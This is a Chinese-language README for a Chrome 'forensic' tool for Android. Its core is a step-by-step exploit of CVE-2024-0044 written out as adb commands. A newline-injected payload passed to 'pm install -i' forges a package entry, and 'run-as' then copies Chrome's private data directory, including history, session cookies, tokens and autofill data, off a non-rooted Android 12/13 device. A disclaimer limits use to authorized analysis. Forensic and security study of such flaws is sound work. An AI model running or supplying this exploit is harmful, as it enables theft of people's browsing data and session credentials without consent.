一个强大的数字取证工具,用于从 Android 设备中提取和分析 Google Chrome 痕迹
作者: JackTekno
GitHub: github.com/JackTekno
该工具利用 CVE-2024-0044(Run-as)漏洞,绕过非 root 的 Android 12/13 设备上的权限限制,从而能够取证提取 Google Chrome 数据。该工具可解析原始 SQLite 数据库并生成全面的分析报告。

从数据采集到报告生成的完整取证分析工作流程
该工具生成一份全面的 Excel 报告(result_chrome_forensic.xlsx),包含以下工作表:
F-Droid.apk)克隆仓库
git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
cd Chrome-Forensic_CVE-2024-0044
安装依赖
pip install -r requirements.txt
# Push a dummy APK to temporary folder
adb push F-Droid.apk /data/local/tmp/base.apk
adb shell pm list packages -U | grep com.android.chrome
# Output example: package:com.android.chrome uid:10129
# Note the UID (e.g., 10129)
⚠️ 将
10129替换为第 3 步中得到的实际 Chrome UID
adb shell
# Inside ADB Shell:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
# Trigger the package manager
pm install -i "$PAYLOAD" /data/local/tmp/base.apk
# Still inside ADB Shell
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar
# Exit ADB Shell
exit
adb pull /data/local/tmp/chrome.tar .
在项目文件夹中解压 'chrome.tar' 文件。您无需手动移动文件。Python 脚本会在解压后的文件夹中自动找到数据库文件。
tar -xf chrome.tar
运行取证分析工具:
python3 chrome_forensic.py
该工具将分析数据库文件,并在同一目录下生成 result_chrome_forensic.xlsx。
⚠️ 重要提示: 此工具仅用于教育和经授权的取证分析目的。
- 仅可对您拥有或已获得明确书面许可分析的设备使用
- 未经授权访问数字设备可能违反您所在司法辖区的法律
- 作者不对误用此工具承担任何责任
欢迎贡献!请随时提交 Pull Request。
本项目采用 GNU 通用公共许可证 v3.0 授权。 详情请参阅 LICENSE 文件。
该采集方法的概念验证(PoC)由 Tinyhack.com 总结并分享。
| 工作表名称 | 描述 |
|---|
| 📖 浏览历史 | 已访问 URL 的详细时间线 |
| 📈 分析 – 热门网站 | 访问量最高的域名的统计排名 |
| ⚠️ 警报 – 可疑 | 自动标记的 URL(黑客、毒品、成人内容) |
| 📥 下载记录 | 包含路径和文件大小的下载历史 |
| 🔍 搜索词条 | 来自地址栏/Google 的用户搜索查询 |
| 🍪 Cookies 与会话 | 会话令牌和 Cookie 元数据(Hex 加密) |
| ✍️ 自动填充数据 | 已保存的表单数据(姓名、地址等) |